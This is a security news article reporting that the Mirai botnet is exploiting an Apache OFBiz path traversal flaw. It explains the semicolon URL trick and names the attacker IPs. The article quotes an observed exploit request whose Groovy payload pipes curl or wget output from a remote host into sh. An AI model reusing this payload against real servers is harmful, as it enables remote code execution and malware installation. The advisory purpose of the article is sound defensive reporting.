Mirai Botnet Attacking Apache OFBiz Directory Traversal Vulnerability

The notorious Mirai botnet has been observed exploiting a recently disclosed directory traversal vulnerability in Apache OFBiz.

This Java-based framework, supported by the Apache Foundation, is used for creating ERP (Enterprise Resource Planning) applications, which are critical for managing sensitive business data despite being less prevalent than commercial alternatives.

Vulnerability Details and Exploitation

According to the SANS reports, the vulnerability, patched in May 2024, affects OFBiz versions before 18.12.13. It allows remote command execution through a path traversal exploit.

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide

The flaw can be triggered by appending a semicolon to a URL, followed by a restricted URL. For instance, the URL /webtools/control/forgotPassword;/ProgramExport can be exploited, as “forgotPassword” does not require authentication and “ProgramExport” permits arbitrary code execution.

An attacker can exploit this vulnerability using a POST request with a URL parameter or a request body. Recent attacks have been observed using the following exploit:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl http://95.214.27.196/where/bin.sh

• User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
• Host: [victim IP address]
• Accept: /
• Upgrade-Insecure-Requests: 1
• Connection: keep-alive
• Content-Type: application/x-www-form-urlencoded
• Content-Length: 147
• groovyProgram=throw+new+Exception(‘curl http://185.196.10.231/sh | sh -s ofbiz || wget -O- http://185.196.10.231/sh | sh -s ofbiz’.execute().text);

Mirai Botnet Activity

The IP addresses 95.214.27.196 and 185.196.10.231 have been identified as hosting and distributing malware, while 83.222.191.62 has been sending exploits in the request body.

These IPs have been actively scanning and exploiting the OFBiz vulnerability, with the IP 185.196.10.231 previously involved in scanning for IoT vulnerabilities.

Since the vulnerability details were made public, there has been a significant increase in scans targeting OFBiz, peaking at nearly 2000 scans daily. This surge indicates that attackers are actively experimenting with and potentially incorporating this vulnerability into botnets like Mirai.

Organizations using Apache OFBiz must urgently apply the latest security updates to mitigate this critical vulnerability.

The rapid exploitation by the Mirai botnet underscores the importance of timely patching and vigilant monitoring to protect sensitive business data from cyber threats.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access